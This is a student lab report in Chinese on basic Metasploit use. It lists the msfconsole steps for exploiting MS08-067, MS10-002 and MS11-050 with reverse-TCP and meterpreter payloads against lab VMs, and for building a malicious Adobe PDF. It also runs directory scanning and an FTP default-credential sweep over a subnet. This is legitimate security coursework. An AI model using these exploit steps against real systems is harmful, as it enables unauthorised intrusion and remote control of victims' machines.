20155227《网络对抗》Exp5 MSF基础应用

基础问题回答

• 用自己的话解释什么是exploit,payload,encode

  • exploit：把实现设置好的东西送到要攻击的主机里。

  • payload：用来攻击的代码、程序等。

  • encode：编码方式，让被传输的东西变得更不易被发现。

实验步骤

1.主动攻击：ms08_067

• 首先，先用search ms08_067查询一下针对该漏洞的攻击模块：

• 用use exploit/windows/smb/ms08_067_netapi使用该模块
• 输入命令show payloads会显示出有效的攻击载荷

• 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
• 输入命令set LHOST "kali Ip" set RHOST "Win xp Ip"
• 使用命令show options查看payload状态

• 输入命令exploit开始攻击，攻击成功

• 在kali上执行ipconfig/all：

• 在win xp上执行ipconfig/all:

发现二者结果相同，说明成功攻击.
还可以进行MS08_067远程漏洞攻击实践：meterpreter：

2.对浏览器攻击：MS11_050漏洞渗透攻击/MS10-002漏洞攻击

• 先利用search ms11_050指令查看可以运用的攻击模块
• 使用use windows/browser/ms11_050_mshtml_cobjectelement模块：
• 用info查看该模块的信息：

• 用set payload windows/meterpreter/reverse_tcp设置payload，并设置需要设置的参数。

• 用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

• 在靶机IE上输入该网址出现404not found的错误：

因为靶机上的IE版本不符合可攻击的版本，所以无法攻击成功。

之后换成了狄惟佳同学提供的IE，在IE中输入网址，查看内容：

但是很快，IE出现弹窗，警告遇到问题需关闭程序。

之后我又尝试了win7下的IE8，也是同样的结果，一输入网址IE就自动关闭。参考了狄同学的博客，修改了IE的安全设置，结果还是不行。

• 我又尝试了成功攻击的同学使用的方法：MS10-002漏洞攻击，同样设置参数后exploit，在靶机IE中输入网址，此时kali中可以看到有目标主机上线，会话建立。

• 输入sessions -i 1，成功获取靶机的shell，可以对其进行操作：

3.针对客户端的攻击：adobe_toolbutton

• 在kali终端中开启msfconsole
• 输入命令use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块的使用
• 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷
• 设置相关数据：

• show options：

• 输入exploit,生成pdf文件，并可以看到pdf所在文件夹，将pdf复制到靶机里：

• 使用use exploit/multi/handler新建监听模块（和前几次实验一样）

• 使用命令exploit开始攻击，在靶机中打开pdf,攻击成功：

4.成功应用任何一个辅助模块

4.1 scanner/http/dir_scanner

• 用show auxiliary查看所有辅助模块，并选择其中的一个，我使用的是scanner/http/dir_scanner扫描网站目录。
• 查看需要设置的参数，设置完成后确认一下，然后就可以开始exploit了：
• 可以进行对单一目标主机的扫描，也可以对指定网段的主机进行扫描：

4.2 auxiliary/scanner/ftp/ftp_login

• 选择ftp_login模块，扫描网段192.168.115.1-10中能使用固定用户名和密码root/123456登陆主机：

• 查看输出结果，可以看出在这10个IP中没有FTP Server使用root/123456账号登陆。通常在公司或学校内网里，很多人习惯使用简单的账号，没有足够的安全意识，当攻击者成功入侵内网后，这些工作站将非常危险。

离实战还缺些什么技术或步骤？

实战的时候要结合靶机的具体环境考虑。

实验体会

Metasploit提供了丰富的扫描功能、攻击脚本及二次开发的平台，使网络安全漏洞检测变得相对容易。在这次实验过程中我走的弯路较少。具体来说就是先寻找可攻击的漏洞、再根据漏洞名和所属目录猜测漏洞攻击的方面、再查看漏洞的详细信息、再设置一系列参数、最后实施攻击并查看攻击结果。

20155227《网络对抗》Exp5 MSF基础应用的更多相关文章

1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

   2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

   2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

   2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

   实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

   实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

6. 20145338 《网络对抗》 MSF基础应用

   20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

7. 20145308 《网络对抗》 MSF基础应用 学习总结

   20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

8. 20145326蔡馨熤《网络对抗》——MSF基础应用

   20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

9. 20155218《网络对抗》MSF基础应用

   20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

1. Java集合类学习笔记（各种Map实现类的性能分析）

   HashMap和Hashtable的实现机制几乎一样,但由于Hashtable是一个古老的.线程安全的集合,因此HashMap通常比Hashtable要快. TreeMap比HashMap和Hasht ...

2. Atitit。Web server Jetty9 使用 attilax 总结

   Atitit.Web server Jetty9 使用 attilax 总结 1.1. 静态文件的资源1 1.2. Servlet使用1 1.3. code1 1.1. 静态文件的资源 WebAppC ...

3. Codeforces Round &num;266 &lpar;Div&period;2&rpar; B Wonder Room --枚举

   题意:给出一个两边长为a,b的矩形,要求增加a和增加b使a*b>=6*n且a*b最小. 解法:设新的a,b为a1,b1,且设a<b,那么a<=a1<=ceil(sqrt(6*n ...

4. Oracle bbed使用说明1

   一.centos上编译安装BBED工具 [orasrv@localhost ~]$ cd $ORACLE_HOME/rdbms/lib [orasrv@localhost ~]$ make -f in ...

5. c&plus;&plus;各种排序

   1.插入排序 void InsertSort(int a[], int n) { int temp, i, j; ; i < n; i++) { ]) { temp = a[i]; ; j &g ...

6. 百度地图 获取矩形point

   http://developer.baidu.com/map/jsdemo.htm#f0_7  鼠标绘制点线面 <!DOCTYPE html><html><head&gt ...

7. Spring事务讲解示例&lpar;转&rpar;

   Spring 事务Transaction1.事务的属性1.1 事务隔离IsolationLevel1.2 事务传播PropagationBehavior1.3 事务超时Timeout1.4 只读状态R ...

8. Mysql&lpar;二&rpar;：库操作

   一 系统数据库 information_schema: 虚拟库,不占用磁盘空间,存储的是数据库启动后的一些参数,如用户表信息.列信息.权限信息.字符信息等performance_schema: MyS ...

9. 【BZOJ1412】狼和羊的故事（网络流）

   [BZOJ1412]狼和羊的故事(网络流) 题面 Description "狼爱上羊啊爱的疯狂,谁让他们真爱了一场:狼爱上羊啊并不荒唐,他们说有爱就有方向．．．．．．" Orez听 ...

10. 学习Timer定时器

    原文地址:http://www.cppblog.com/ivenher/articles/19969.html setTimer函数用于创建一个计时器,KillTimer函数用于销毁一个计时器.计时器 ...